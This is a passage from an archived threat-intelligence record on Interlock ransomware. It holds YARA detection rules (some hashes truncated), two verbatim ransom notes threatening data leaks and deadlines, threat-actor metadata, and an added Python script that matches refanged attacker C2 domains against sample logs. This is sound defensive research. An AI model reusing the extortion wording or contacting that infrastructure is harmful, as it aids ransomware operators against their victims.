source = \"Sekoia.io\"\r\n        creation_date = \"2024-11-14\"\r\n        classification = \"TLP:GREEN\"\r\n    condition:\r\n        // Both SHA-256 values below are cut off in this archived copy (64 hex digits expected); restore them from the original post before using the rule.\r\n        for any i in (0..pe.number_of_resources-1) : (\r\n            hash.sha256(pe.resources[i].offset, pe.resources[i].length) == \"0e0a647b3156d430cd70ad5a430277dc99014d0\"\r\n            or hash.sha256(pe.resources[i].offset, pe.resources[i].length) == \"58ed0431455a1d354369206a1197d1acfcd3\"\r\n        )\r\n}\r\n\r\nrule Interlock_ClickFix_PowerShell_loader {\r\n    meta:\r\n        id = \"78e02729-d926-4600-affc-6e249e90ce19\"\r\n        version = \"1.0\"\r\n        intrusion_set = \"Interlock\"\r\n        // description text is cut off in this archived copy\r\n        description = \"Detect the PowerShell loader used by Interlock operators to execute the PowerShell backd\"\r\n        source = \"Sekoia.io\"\r\n        creation_date = \"2025-03-31\"\r\n        classification = \"TLP:GREEN\"\r\n    strings:\r\n        // \"}.Items(), 4 + 16)\"\r\n        $ = {7D 2E 49 74 65 6D 73 28 29 2C 20 34 20 2B 20 31 36 29}\r\n        $ = \"} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(\"\r\n    condition:\r\n        all of them\r\n}\r\n\r\nimport \"vt\"\r\n\r\nrule crypter_win_interlock_keywords_nov24 {\r\n    meta:\r\n        id = \"ae3905ee-046b-415e-b83c-9e5d07d6b443\"\r\n        version = \"1.0\"\r\n        intrusion_set = \"Interlock ransomware operators\"\r\n        description = \"Finds crypter used by Interlock and Rhysida intrusion sets\"\r\n        source = \"Sekoia\"\r\n        creation_date = \"2024-11-18\"\r\n        hash = \"1f568c2eaa8325bf7afcf7a90f9595f8b601a085769a44c4ffa1cdfdd283594c\"\r\n        hash = \"8e273e1e65b337ad8d3b2dec6264ed90d1d0662bd04d92cbd02943a7e12df95a\"\r\n    strings:\r\n        $wrd01 = \"ceremoniously\" ascii\r\n        $wrd02 = \"biophysicist\" ascii\r\n        $wrd03 = \"cyberpunks\" ascii\r\n        $wrd04 = \"undercarriages\" ascii\r\n        $wrd05 = \"abomination\" ascii\r\n        $wrd06 = \"greediness\" ascii\r\n        $wrd07 = \"Heaviside\" ascii\r\n        $wrd08 = \"misapprehending\" ascii\r\n        $wrd09 = \"magnetosphere\" ascii\r\n        $wrd10 = \"distinctively\" ascii\r\n        $wrd11 = \"stringently\" ascii\r\n        $wrd12 = \"sentimentalist\" ascii\r\n        $wrd13 = 
\"hydrocarbons\" ascii\r\n$wrd14 = \"discontinuations\" ascii\r\n$wrd15 = \"woodcutter\" ascii\r\n$wrd16 = \"preoccupation\" ascii\r\n$wrd17 = \"pocketful\" ascii\r\n$wrd18 = \"Polynesian\" ascii\r\n$wrd19 = \"laundrymen\" ascii\r\n$wrd20 = \"hyprocri\" ascii\r\n$wrd21 = \"interlocking\" ascii\r\n$wrd22 = \"blackballing\" ascii\r\n$wrd23 = \"selectivity\" ascii\r\n$wrd24 = \"incontrovertible\" ascii\r\n$wrd25 = \"mutinously\" ascii\r\n$hea01 = \"\u003csupportedOS Id=\\\"{\" ascii\r\ncondition:\r\nuint16(0)==0x5A4D\r\nand 5 of ($wrd*)\r\nand #hea01 \u003e 4\r\nand vt.metadata.new_file\r\nhttps://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/\r\nPage 20 of 24\n\nand filesize \u003c 2MB\r\n}\r\nRansom notes\r\nfrom a26f0a2da63a838161a7d335aaa5e4b314a232acc15dcabdb6f6dbec63cda642 (2024-10-11)\r\n!__README__!.txt\r\n INTERLOCK - CRITICAL SECURITY ALERT\r\nTo Whom It May Concern,\r\nYour organization has experienced a serious security breach. Immediate action is required to mitigate\r\n THE CURRENT SITUATION\r\n- Your systems have been infiltrated by unauthorized entities.\r\n- Key files have been encrypted and are now inaccessible to you.\r\n- Sensitive data has been extracted and is in our possession.\r\n WHAT YOU NEED TO DO NOW\r\n1. Contact us via our secure, anonymous platform listed below.\r\n2. Follow all instructions to recover your encrypted data.\r\nAccess Point:\r\nUse your unique Company ID:\r\n DO NOT ATTEMPT:\r\n- File alterations: Renaming, moving, or tampering with files will lead to irreversible damage.\r\n- Third-party software: Using any recovery tools will corrupt the encryption keys, making recovery im\r\n- Reboots or shutdowns: System restarts may cause key damage. 
Proceed at your own risk.\r\n HOW DID THIS HAPPEN?\r\nWe identified vulnerabilities within your network and gained access to critical parts of your infrast\r\n- Personal records and client information\r\n- Financial statements, contracts, and legal documents\r\n- Internal communications\r\n- Backups and business-critical files\r\nWe hold full copies of these files, and their future is in your hands.\r\n YOUR OPTIONS\r\n#1. Ignore This Warning:\r\n- In 96 hours, we will release or sell your sensitive data.\r\n- Media outlets, regulators, and competitors will be notified.\r\n- Your decryption keys will be destroyed, making recovery impossible.\r\n- The financial and reputational damage could be catastrophic.\r\n#2. Cooperate With Us:\r\n- You will receive the only working decryption tool for your files.\r\n- We will guarantee the secure deletion of all exfiltrated data.\r\n- All traces of this incident will be erased from public and private records.\r\n- A full security audit will be provided to prevent future breaches.\r\n FINAL REMINDER\r\nFailure to act promptly will result in:\r\n- Permanent loss of all encrypted data.\r\n- Leakage of confidential information to the public, competitors, and authorities.\r\n- Irreversible financial harm to your organization.\r\n CONTACT US SECURELY\r\n1. Install the TOR browser via\r\n2. Visit our anonymous contact form at\r\n3. Use your unique Company ID:\r\n4. Review a sample of your compromised data for verification.\r\n5. Use a VPN if TOR is restricted in your area.\r\nfrom 4a97599ff5823166112d9221d0e824af7896f6ca40cd3948ec129533787a3ea9 (2025-02-21)\r\nFIRST_READ_ME.txt\r\nFinal Warning: Your Data Is at Risk\r\nTo the Leadership of Your Organization\r\nWe have encrypted your systems and extracted sensitive information from\r\nyour network. 
Your organization's failure to prioritize cybersecurity\r\nhas left critical data vulnerable, and now, the consequences are at\r\nhand.\r\n---\r\nWhat You Need to Know:\r\n1. We have seized key documents, customer information, and confidential\r\nbusiness data.\r\n2. Access to these files has been locked with advanced encryption.\r\n3. Responsibility for this breach lies with your organization, as you\r\nare obligated by law to protect Non-Public Information (NPI).\r\n---\r\nLegal and Financial Risks:\r\nIf you fail to act within 72 hours, we will begin publishing your data\r\non our leak platforms. The consequences will include:\r\n- Violations of laws such as GDPR, HIPAA, CCPA, GLBA, and NYDFS\r\nCybersecurity Regulation.\r\n- Severe fines for non-compliance and lawsuits from affected parties.\r\n- Long-term reputational damage to your business, leading to client and\r\npartner losses.\r\n---\r\nYour Actions:\r\nTo prevent escalation, you must cooperate immediately.\r\n1. Access our Recovery Platform via TOR Browser:\r\n - Download TOR from\r\n.\r\n - Open:\r\n - Use your Organization ID\r\n to create a\r\n private negotiation chat.\r\n2. Alternative Access for Regular Browsers:\r\n - Open Chrome, Edge, or Firefox.\r\n - Navigate to:\r\n - Enter your Organization ID\r\n for\r\ninstructions.\r\n---\r\nImportant Warning:\r\n- Do not attempt self-recovery; it will fail and lead to data\r\ncorruption.\r\n- Avoid engaging third-party negotiators or law enforcement; this will\r\nvoid any possibility of resolution.\r\n- Remember, the data we hold could be used by regulators, competitors,\r\nor even the media, causing irreparable harm to your business.\r\nTime is of the essence. Every hour of inaction increases the likelihood\r\nof devastating consequences. 
Make the right decision secure your future\r\nby cooperating with us now.\r\nList of references\r\n[Fortinet] Ransomware Roundup – Interlock\r\n[Cisco Talos] Unwrapping the emerging Interlock ransomware attack\r\nTDR is the Sekoia Threat Detection \u0026 Research team. Created in 2020, TDR provides exclusive Threat\r\nIntelligence, including fresh and contextualised IOCs and threat reports for the Sekoia SOC Platform. TDR is also\r\nresponsible for producing detection materials through a built-in Sigma, Sigma Correlation and Anomaly rules\r\ncatalogue. TDR is a team of multidisciplinary and passionate cybersecurity experts, including security researchers,\r\ndetection engineers, reverse engineers, and technical and strategic threat intelligence analysts. Threat Intelligence\r\nanalysts and researchers are looking at state-sponsored \u0026 cybercrime threats from a strategic to a technical\r\nperspective to track, hunt and detect adversaries. Detection engineers focus on creating and maintaining high-quality detection rules to detect the TTPs most widely exploited by adversaries. TDR experts regularly share their\r\nanalysis and discoveries with the community through our research blog, GitHub repository or X / Twitter account.\r\nYou may also come across some of our analysts and experts at international conferences (such as BotConf, Virus\r\nBulletin, CoRIIN and many others), where they present the results of their research work and investigations.\r\nSource: https://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/"
	],
	"report_names": [
		"interlock-ransomware-evolving-under-the-radar"
	],
	"threat_actors": [
		{
			"id": "1b1271d2-e9a2-4fc5-820b-69c9e4cfb312",
			"created_at": "2024-06-07T02:00:03.998431Z",
			"updated_at": "2026-04-10T02:00:03.64336Z",
			"deleted_at": null,
			"main_name": "RansomHub",
			"aliases": [],
			"source_name": "MISPGALAXY:RansomHub",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "77b28afd-8187-4917-a453-1d5a279cb5e4",
			"created_at": "2022-10-25T15:50:23.768278Z",
			"updated_at": "2026-04-10T02:00:05.266635Z",
			"deleted_at": null,
			"main_name": "Inception",
			"aliases": [
				"Inception Framework",
				"Cloud Atlas"
			],
			"source_name": "MITRE:Inception",
			"tools": [
				"PowerShower",
				"VBShower",
				"LaZagne"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "8c8fea8c-c957-4618-99ee-1e188f073a0e",
			"created_at": "2024-02-02T02:00:04.086766Z",
			"updated_at": "2026-04-10T02:00:03.563647Z",
			"deleted_at": null,
			"main_name": "Storm-1567",
			"aliases": [
				"Akira",
				"PUNK SPIDER",
				"GOLD SAHARA"
			],
			"source_name": "MISPGALAXY:Storm-1567",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "910b38e9-07fe-4b47-9cf4-e190a07b1b84",
			"created_at": "2024-04-24T02:00:49.516358Z",
			"updated_at": "2026-04-10T02:00:05.309426Z",
			"deleted_at": null,
			"main_name": "Akira",
			"aliases": [
				"Akira",
				"GOLD SAHARA",
				"PUNK SPIDER",
				"Howling Scorpius"
			],
			"source_name": "MITRE:Akira",
			"tools": [
				"Mimikatz",
				"PsExec",
				"AdFind",
				"Akira _v2",
				"Akira",
				"Megazord",
				"LaZagne",
				"Rclone"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "13623ffb-4701-4f3d-bf32-8826346433ac",
			"created_at": "2024-12-21T02:00:02.850766Z",
			"updated_at": "2026-04-10T02:00:03.784245Z",
			"deleted_at": null,
			"main_name": "FunkSec",
			"aliases": [],
			"source_name": "MISPGALAXY:FunkSec",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434692,
	"ts_updated_at": 1775791850,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b139c9201b7bf2c2aec96a7660254f37e035ae9a.pdf",
		"text": "https://archive.orkl.eu/b139c9201b7bf2c2aec96a7660254f37e035ae9a.txt",
		"img": "https://archive.orkl.eu/b139c9201b7bf2c2aec96a7660254f37e035ae9a.jpg"
	}
}
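The indicators in the report's "URLs" and "PowerShell backdoor C2 domains" lists are defanged (`[.]`), mix bare hostnames with URLs carrying ports and paths, and sit on a shared tunnelling service (`trycloudflare.com`) where blocking the whole domain would break legitimate traffic. The script below is an added example, not code from the Sekoia post: it refangs a constructed subset of those indicators, reduces each to its exact host, matches that host list against constructed proxy log lines (the log format, client IPs and timestamps are assumptions), and, as a separate sanity check on the YARA section, decodes the hex string of `Interlock_ClickFix_PowerShell_loader` to confirm it equals the ASCII shown in the rule's comment.

```python
import re
from urllib.parse import urlsplit

# Constructed subset of the defanged indicators listed in the report;
# the complete lists are in the "URLs" and "PowerShell backdoor C2 domains" sections.
IOC_TEXT = """
https://microsoft-msteams[.]com/additional-check.html
http://64.95.10[.]95:8080/misteams
https://dc-broader-green-norwegian[.]trycloudflare.com/12341234
refrigerator-cheers-indicator-ferrari[.]trycloudflare.com
sublime-forecasts-pale-scored[.]trycloudflare.com
www.sublime-forecasts-pale-scored[.]trycloudflare.com
"""

# Constructed proxy log lines (assumed format):
# "<timestamp> <client-ip> <destination-host> <status> <method> <path>"
SAMPLE_LOGS = [
    "2025-03-24T10:00:01Z 10.0.0.5 MICROSOFT-MSTEAMS.COM 200 GET /additional-check.html",
    "2025-03-24T10:00:02Z 10.0.0.6 login.microsoftonline.com 200 GET /",
    "2025-03-24T10:00:03Z 10.0.0.7 64.95.10.95 200 GET /misteams",
    "2025-03-24T10:00:04Z 10.0.0.8 some-legit-dev-tunnel.trycloudflare.com 200 GET /api",
    "2025-03-24T10:00:05Z 10.0.0.9 www.sublime-forecasts-pale-scored.trycloudflare.com 200 POST /",
    "malformed line that does not match the log format",
]

DEFANG_RE = re.compile(r"\[\.\]|\(\.\)|\{\.\}|\[dot\]", re.IGNORECASE)
SCHEME_RE = re.compile(r"^hxxp(s?)://", re.IGNORECASE)


def refang(ioc: str) -> str:
    """Undo the usual defanging ([.] -> ., hxxp:// -> http://) on one indicator."""
    s = DEFANG_RE.sub(".", ioc.strip())
    return SCHEME_RE.sub(lambda m: "http" + m.group(1).lower() + "://", s)


def extract_host(ioc: str) -> str:
    """Return the lowercase host of a refanged URL or bare hostname, without port or path."""
    s = refang(ioc)
    if not s:
        return ""
    if "://" not in s:
        s = "//" + s  # lets urlsplit treat a bare host[:port] as the netloc
    host = urlsplit(s).hostname
    return host.lower() if host else ""


def load_hosts(text: str) -> set:
    """Build the exact-match blocklist: one entry per distinct host in the IOC text."""
    return {h for line in text.splitlines() if (h := extract_host(line))}


LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<host>\S+) (?P<status>\d{3}) ")


def scan_logs(lines, hosts):
    """Return (client-ip, host) for each log line whose destination host is on the blocklist.

    Matching is on the exact host: other *.trycloudflare.com tunnels are legitimate and must not hit.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # skip lines that do not follow the expected format
        host = m.group("host").lower()
        if host in hosts:
            hits.append((m.group("src"), host))
    return hits


def yara_hex_to_ascii(pattern: str) -> str:
    """Decode a YARA hex string such as '{7D 2E 49 ...}' so the comment beside it can be checked."""
    return bytes.fromhex(pattern.strip("{} ")).decode("ascii")


# Hex string taken verbatim from rule Interlock_ClickFix_PowerShell_loader above.
LOADER_HEX = "{7D 2E 49 74 65 6D 73 28 29 2C 20 34 20 2B 20 31 36 29}"


if __name__ == "__main__":
    blocklist = load_hosts(IOC_TEXT)
    for src, host in scan_logs(SAMPLE_LOGS, blocklist):
        print(f"hit: {src} -> {host}")
    print("loader hex decodes to:", yara_hex_to_ascii(LOADER_HEX))
```

The blocklist keeps `sublime-forecasts-pale-scored.trycloudflare.com` and its `www.` variant as two separate entries, exactly as the report lists them; if your proxy logs record the host with the port attached, strip it before the lookup, as `extract_host` already does for the indicators.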